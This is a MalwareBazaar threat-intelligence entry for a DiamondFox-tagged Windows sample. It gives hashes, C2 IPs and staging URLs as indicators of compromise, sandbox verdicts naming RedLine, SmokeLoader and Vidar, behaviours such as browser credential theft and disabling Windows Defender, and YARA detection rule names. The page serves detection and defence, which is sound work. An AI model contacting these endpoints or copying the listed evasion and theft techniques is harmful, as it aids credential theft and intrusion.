MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 76b87f4f61c849a8af46ebdcb899a0bea036b18f6b473bed34562212eab16b93. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


DiamondFox


Vendor detections: 12


Intelligence 12 IOCs 4 YARA 15 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 76b87f4f61c849a8af46ebdcb899a0bea036b18f6b473bed34562212eab16b93
SHA3-384 hash: 1d63412f2a4b8ffe198b385fd7d8cbfb68bdf03d59e4ec4606192a3f85a8179147b7c666d65124a75b2148f6adc7c8d8
SHA1 hash: 696bd5772f35e7029fff2ec5a5a170b0df1e0157
MD5 hash: 6e7c73591f14dc0be945a5afccb7b9fd
humanhash: queen-triple-gee-washington
File name:6E7C73591F14DC0BE945A5AFCCB7B9FD.exe
Download: download sample
Signature DiamondFox
Create hunting rule
File size:4'424'724 bytes
First seen:2021-07-08 10:30:36 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash fcf1390e9ce472c7270447fc5c61a0c1 (863 x DCRat, 118 x NanoCore, 94 x njrat)
ssdeep 98304:UbZe1z/BopUOHzdizE4v9GRkyZ9ZiVdWtxmCN:UNeT1Sooo9GBjZiVdXCN
Threatray 974 similar samples on MalwareBazaar
TLSH T18F2633916CE0D0B2D16716764A3D6B22447DBC208E6CCEEF5798095FDA32181FB36B93
Reporter abuse_ch
Tags:DiamondFox exe


Avatar
abuse_ch
DiamondFox C2:
65.21.122.45:8085

Indicators Of Compromise (IOCs)

Below is a list of indicators of compromise (IOCs) associated with this malware samples.

IOCThreatFox Reference
65.21.122.45:8085 https://threatfox.abuse.ch/ioc/158437/
95.213.224.25:80 https://threatfox.abuse.ch/ioc/158445/
http://purchatewow.xyz/g6Vce4s2S/index.php https://threatfox.abuse.ch/ioc/158446/
http://34.89.184.90/ https://threatfox.abuse.ch/ioc/158448/

Intelligence

File Origin
# of uploads :
1
# of downloads :
143
Origin country :
n/a
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
6E7C73591F14DC0BE945A5AFCCB7B9FD.exe
Verdict:
Malicious activity
Analysis date:
2021-07-08 10:36:55 UTC
Tags:
autoit evasion trojan rat redline phishing stealer
Link:
https://app.any.run/tasks/b93f5743-1e46-4d5c-a1ae-b3e4c5fd1b24

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection:
RedLine
Create hunting rule
Link:
https://www.capesandbox.com/analysis/170404/
Detection(s):
Win.Malware.Generic-9866235-0
Create hunting rule

Win.Malware.Nymeria-9873414-0
Create hunting rule

Win.Malware.SmokeLoader-9874090-1
Create hunting rule

Win.Malware.Generic-9874384-0
Create hunting rule

Win.Malware.Qshell-9875653-0
Create hunting rule

SecuriteInfo.com.Trojan.Rasftuby.Gen.14.10239.27368.UNOFFICIAL
Create hunting rule

Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Malware family:
Socelars
Create hunting rule
Verdict:
Malicious
Link:
https://analyze.intezer.com/analyses/073e4363-c11c-435c-a323-07cad6d5edcd
Result
Threat name:
Backstage Stealer RedLine SmokeLoader So
Create hunting rule
Detection:
malicious
Classification:
troj.spyw.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/813399
Signature
Allocates memory in foreign processes
Antivirus detection for dropped file
Antivirus detection for URL or domain
Binary is likely a compiled AutoIt script file
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Detected unpacking (overwrites its own PE header)
Detected VMProtect packer
Disable Windows Defender real time protection (registry)
DLL reload attack detected
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found C&C like URL pattern
Machine Learning detection for dropped file
Machine Learning detection for sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
PE file contains section with special chars
PE file has nameless sections
Performs DNS queries to domains with low reputation
Renames NTDLL to bypass HIPS
Sample is protected by VMProtect
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Svchost Process
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Yara detected Backstage Stealer
Yara detected RedLine Stealer
Yara detected SmokeLoader
Yara detected Socelars
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 445810 Sample: Mh2FzBrd3m.exe Startdate: 08/07/2021 Architecture: WINDOWS Score: 100 70 download-serv-632457.xyz 104.21.8.151, 443, 49783 CLOUDFLARENETUS United States 2->70 72 email.yg9.me 198.13.62.186 AS-CHOOPAUS United States 2->72 104 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->104 106 Antivirus detection for URL or domain 2->106 108 Antivirus detection for dropped file 2->108 110 18 other signatures 2->110 9 Mh2FzBrd3m.exe 1 16 2->9         started        12 iexplore.exe 2->12         started        signatures3 process4 file5 42 C:\Users\user\Desktop\pub2.exe, PE32 9->42 dropped 44 C:\Users\user\Desktop\jg3_3uag.exe, PE32 9->44 dropped 46 C:\Users\user\Desktop\KRSetp.exe, PE32 9->46 dropped 48 7 other files (2 malicious) 9->48 dropped 14 Infos.exe 9->14         started        19 pub2.exe 9->19         started        21 Folder.exe 9->21         started        25 6 other processes 9->25 23 iexplore.exe 12->23         started        process6 dnsIp7 74 www.jinhuamz.com 14->74 76 www.jinhuamz.com 103.155.92.207, 49747, 80 TWIDC-AS-APTWIDCLimitedHK unknown 14->76 84 13 other IPs or domains 14->84 50 C:\Users\...\yWtSYVY4TK_QCMtkFpaXicVf.exe, PE32 14->50 dropped 52 C:\Users\...\ukH7Pe4QK3y4Yq_bYAIBTt8E.exe, PE32 14->52 dropped 54 C:\Users\...\oKvbfQEkGocK1UBmlS7eaTdQ.exe, PE32 14->54 dropped 64 33 other files (26 malicious) 14->64 dropped 88 Drops PE files to the document folder of the user 14->88 90 Performs DNS queries to domains with low reputation 14->90 92 Disable Windows Defender real time protection (registry) 14->92 56 C:\Users\user\AppData\Local\Temp\CC4F.tmp, PE32 19->56 dropped 94 DLL reload attack detected 19->94 96 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 19->96 98 Renames NTDLL to bypass HIPS 19->98 100 Checks if the current machine is a virtual machine (disk enumeration) 19->100 58 C:\Users\user\AppData\Local\Temp\axhub.dll, PE32 21->58 dropped 27 rundll32.exe 21->27         started        30 conhost.exe 21->30         started        78 iplogger.org 23->78 80 176.113.115.136 SELECTELRU Russian Federation 25->80 82 videoconvert-download38.xyz 172.67.201.250, 443, 49733 CLOUDFLARENETUS United States 25->82 86 11 other IPs or domains 25->86 60 C:\Users\user\Documents\...\jg3_3uag.exe, PE32 25->60 dropped 62 C:\Users\user\AppData\Roaming\2010394.exe, PE32 25->62 dropped 66 8 other files (5 malicious) 25->66 dropped 102 Detected unpacking (overwrites its own PE header) 25->102 32 File.exe 3 19 25->32         started        36 jfiag3g_gg.exe 25->36         started        file8 signatures9 process10 dnsIp11 112 Writes to foreign memory regions 27->112 114 Allocates memory in foreign processes 27->114 116 Creates a thread in another existing process (thread injection) 27->116 68 newja.webtm.ru 92.53.96.150, 49721, 80 TIMEWEB-ASRU Russian Federation 32->68 40 C:\Users\Public\run.exe, PE32 32->40 dropped 118 Binary is likely a compiled AutoIt script file 32->118 120 Drops PE files to the user root directory 32->120 38 run.exe 32->38         started        122 Tries to harvest and steal browser information (history, passwords, etc) 36->122 file12 signatures13 process14
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/76b87f4f61c849a8af46ebdcb899a0bea036b18f6b473bed34562212eab16b93/
Threat name:
Win32.Trojan.Tiggre
Create hunting rule
Status:
Malicious
First seen:
2021-07-06 21:49:00 UTC
AV detection:
19 of 29 (65.52%)
Threat level:
  5/5
Detection(s):
Malicious file
Link:
https://check.spamhaus.org/check/?searchterm=o24h6t3bzbe2rl2g5polrgnax2qdnmmpnndtx3jukyrbf2vrnojq._file
Verdict:
malicious
Similar samples:
2263fd1332612187cb951793ae3b34b74bd815da95d82b9d04d1fd6facb8311b
DiamondFox
510d3eadc5652908d47db79067009b04cf4e9234720f052e90cc7d18ffad0b20
DiamondFox
83b3a04479c4310f0ac695041b3c1d60c144be650d4b8838a395ca5a46e722e2
DiamondFox
923e1d37bb37118bd66462b153d9fa0d4518898ed56f0252690a6d9eb111a0d7
DiamondFox
924bb78c8e816ebd25d656fb6cf0387449cd4b3cd55846c99d4f0ddb47f71dd5
DiamondFox
af350212764e6304bf417e81cf0009b494119670e4bc1b187cd79cf4c487c7b6
DiamondFox
bf86597d2d10ad8d82f0af8b53cf72757094322e79e92180092aa60341b90034
DiamondFox
d03c955b566ad3308d6f9fe90c320300b097e649c9c7380d48cf06815d4988b9
DiamondFox
e1fffde5cce94f703cbaf29b14bf0e7569ad207a0a7f4fc63484ced33307198b
DiamondFox
fe8417ad3e0bad396fd009f20ad6cb106605098ec72fb933bb6f8e16cb6d437d
DiamondFox
+ 964 additional samples on MalwareBazaar
Result
Malware family:
vidar
Create hunting rule
Score:
  10/10
Tags:
family:redline family:smokeloader family:socelars family:vidar botnet:#2 botnet:07_07_r botnet:sel7 backdoor evasion infostealer persistence spyware stealer themida trojan upx vmprotect
Link:
https://tria.ge/reports/210708-bfmw8c2b3j/
Behaviour
Checks SCSI registry key(s)
Delays execution with timeout.exe
Download via BitsAdmin
Kills process with taskkill
Modifies Internet Explorer settings
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
NSIS installer
Enumerates physical storage devices
Program crash
autoit_exe
Adds Run key to start application
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
Downloads MZ/PE file
Executes dropped EXE
UPX packed file
VMProtect packed file
Process spawned unexpected child process
RedLine
RedLine Payload
SmokeLoader
Socelars
Socelars Payload
Vidar
Malware Config
C2 Extraction:
shurinedn.xyz:80
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
xtarweanda.xyz:80
kathonaror.xyz:80
Unpacked files
SH256 hash:
8ac07124315f36db78c157ed5d2c3d7ed75120ecc4d0d4a6622de2a98f587c16
MD5 hash:
2f1ae78cae116a020760f54479c3e9b3
SHA1 hash:
433fe2252e21043a302af27a6a0741499cefd4ed
Link:
https://www.unpac.me/results/770d3e71-92d1-41c0-afe1-841f3920d517/
SH256 hash:
10a122bd647c88aa23f96687e26b251862e83be9dbb89532f4a578689547972d
MD5 hash:
89c739ae3bbee8c40a52090ad0641d31
SHA1 hash:
d0f7dc9a0a3e52af0f9f9736f26e401636c420a1
Link:
https://www.unpac.me/results/770d3e71-92d1-41c0-afe1-841f3920d517/
SH256 hash:
4826f8881d91075a3be54defb778f2fbabee3730afd77d0e0fb9df8b36279b2e
MD5 hash:
e21179e02e3c5df20739130690444fe5
SHA1 hash:
e948c3b760a2fab0f9db2b3f80001cf787b83542
Link:
https://www.unpac.me/results/770d3e71-92d1-41c0-afe1-841f3920d517/
SH256 hash:
6e944a5c9522ee0cd6a292d8e9a454e0ef4f8ae652ddb022e5b80fb6d8559f9d
MD5 hash:
3b1563f44f68d4e5e4490924c5c2a19a
SHA1 hash:
a7d7537809dce6b6200951cbcf5549c57162aed7
Link:
https://www.unpac.me/results/770d3e71-92d1-41c0-afe1-841f3920d517/
SH256 hash:
800aed6f311b0c6842cee6d46c97e48603e8978e0a017608f880bb21806d82d1
MD5 hash:
cd3c6c930d2a581fbf0be30a170d22e2
SHA1 hash:
3b67cbe0a6f27b4746d98ba170d3215850b0d57d
Link:
https://www.unpac.me/results/770d3e71-92d1-41c0-afe1-841f3920d517/
SH256 hash:
bd9afd883e9ffef0535c464d6b9b6f8671236adfa3e49b646d52f762fd2e6c32
MD5 hash:
9304bc8371fe453dfda577fd3af9bf6b
SHA1 hash:
5f3d5d0bc7ae163e1ae42a0acd1435b8b263333c
Link:
https://www.unpac.me/results/770d3e71-92d1-41c0-afe1-841f3920d517/
SH256 hash:
67cdc7c5de5e46229adc831dc6fd3053d996ecf02e94706b6b6ae1b0ed976f2c
MD5 hash:
555b5b60b2dcc53e71e6d9ba8302c4b9
SHA1 hash:
550326b1226629a867d4606ad0c98c4ef9596b47
Link:
https://www.unpac.me/results/770d3e71-92d1-41c0-afe1-841f3920d517/
Parent samples :
e47bfa7b58706edeeaf73664039c10cb1ff7a517d833c0b28751b835bdc68cf7
32ac0624a534a2c40fb8eba41e80bb1d31b99cd118d42208c89229079699f783
SH256 hash:
574a1e8093a8a16ebc96234701b1b14851f0c3bd2d5d5f687be59ac09b6554f3
MD5 hash:
08ff8f4643d75e0e160dfe7d9c9c006a
SHA1 hash:
890c655b9b28e0ac6bac1c8666b5b4be47011867
Link:
https://www.unpac.me/results/770d3e71-92d1-41c0-afe1-841f3920d517/
SH256 hash:
55cdb9054f66ed88b8215d9f981efd7421c6f50dc9285140ec5ff591e34121bd
MD5 hash:
5631522a0758055c133e7966c1948802
SHA1 hash:
90caf8180bf43727fc490ffa34b1d578833aad7f
Link:
https://www.unpac.me/results/770d3e71-92d1-41c0-afe1-841f3920d517/
SH256 hash:
3e62ffd46bb97dad1c9542d7c310fd76307934b38a4ade5d4100cd00aaffa880
MD5 hash:
1098fd963a65a47d1e9da0e0768ee83c
SHA1 hash:
f107d50e8bd9e94f902a46d429a088379f236e83
Link:
https://www.unpac.me/results/770d3e71-92d1-41c0-afe1-841f3920d517/
SH256 hash:
61726a448ca99d1b0f9cdaa88095db0135995b9994b2a553932e5c19108d9778
MD5 hash:
d1c35656d6a0da2a38765a35d4f1a431
SHA1 hash:
0474082666239da6792d58cfb98ac048b52d1d54
Link:
https://www.unpac.me/results/770d3e71-92d1-41c0-afe1-841f3920d517/
SH256 hash:
3cca3f6c7d9e37e1eb9c90650a9c10781082aba2a6f6629077712e0c3e527ec7
MD5 hash:
4f0ed7c51d3975e1f84a7fa8d0277254
SHA1 hash:
16b1ec5559460d666cc5737330f7a915daaeabdd
Link:
https://www.unpac.me/results/770d3e71-92d1-41c0-afe1-841f3920d517/
SH256 hash:
5e0c437319e76a2ed70ef13af8e52f9d0a5d57f3d72b14b13372f1d58c4e8e50
MD5 hash:
f721d8fd486186264986aacaf7536ca6
SHA1 hash:
545a86ebd25eaa038c2360a149fb9174a460d482
Link:
https://www.unpac.me/results/770d3e71-92d1-41c0-afe1-841f3920d517/
SH256 hash:
71b265ca1f32bb594f6ce963a598fe9d4b38f75e0f73148d651b53c6179e854d
MD5 hash:
dae724ff4e2523686867ea7096f0b6f1
SHA1 hash:
3ec5e6829c82eb3e7b2f17eacbb49028c9eda7c3
Detections:
win_socelars_auto
Create hunting rule
Link:
https://www.unpac.me/results/770d3e71-92d1-41c0-afe1-841f3920d517/
SH256 hash:
8ddd7e5fecbc3cb9ef3dd0bfdb15bc872b74617f5fad07e872a6fce9d9d60e41
MD5 hash:
be722cf73d7aaba752f103beb792d749
SHA1 hash:
26d48b7a10906cb830ac812aee33fa0133f4ae3e
Link:
https://www.unpac.me/results/770d3e71-92d1-41c0-afe1-841f3920d517/
SH256 hash:
76b87f4f61c849a8af46ebdcb899a0bea036b18f6b473bed34562212eab16b93
MD5 hash:
6e7c73591f14dc0be945a5afccb7b9fd
SHA1 hash:
696bd5772f35e7029fff2ec5a5a170b0df1e0157
Link:
https://www.unpac.me/results/770d3e71-92d1-41c0-afe1-841f3920d517/
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
iSpy Keylogger
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/76b87f4f61c849a8af46ebdcb899a0bea036b18f6b473bed34562212eab16b93

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Amadey
Create hunting rule
Author:kevoreilly
Description:Amadey Payload
Rule name:Glasses
Create hunting rule
Author:Seth Hardy
Description:Glasses family
Rule name:GlassesCode
Create hunting rule
Author:Seth Hardy
Description:Glasses code features
Rule name:INDICATOR_EXE_Packed_Themida
Create hunting rule
Author:ditekSHen
Description:Detects executables packed with Themida
Rule name:INDICATOR_EXE_Packed_VMProtect
Create hunting rule
Author:ditekSHen
Description:Detects executables packed with VMProtect.
Rule name:INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
Create hunting rule
Author:ditekSHen
Description:Detects executables containing SQL queries to confidential data stores. Observed in infostealers
Rule name:INDICATOR_SUSPICIOUS_Stomped_PECompilation_Timestamp_InTheFuture
Create hunting rule
Author:ditekSHen
Description:Detect executables with stomped PE compilation timestamp that is greater than local current time
Rule name:MALWARE_Win_HyperBro03
Create hunting rule
Author:ditekSHen
Description:Hunt HyperBro IronTiger / LuckyMouse / APT27 malware
Rule name:MALWARE_Win_RedLine
Create hunting rule
Author:ditekSHen
Description:Detects RedLine infostealer
Rule name:Ping_Del_method_bin_mem
Create hunting rule
Author:James_inthe_box
Description:cmd ping IP nul del
Rule name:suspicious_packer_section
Create hunting rule
Author:@j0sm1
Description:The packer/protector section names/keywords
Reference:http://www.hexacorn.com/blog/2012/10/14/random-stats-from-1-2m-samples-pe-section-names/
Rule name:SUSP_XORed_Mozilla
Create hunting rule
Author:Florian Roth
Description:Detects suspicious XORed keyword - Mozilla/5.0
Reference:Internal Research
Rule name:SUSP_XORed_MSDOS_Stub_Message
Create hunting rule
Author:Florian Roth
Description:Detects suspicious XORed MSDOS stub message
Reference:https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Rule name:win_smokeloader_a2
Create hunting rule
Author:pnx
Rule name:with_sqlite
Create hunting rule
Author:Julian J. Gonzalez <info@seguridadparatodos.es>
Description:Rule to detect the presence of SQLite data in raw image
Reference:http://www.st2labs.com

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape
Cape
https://www.capesandbox.com/analysis/170404/

Comments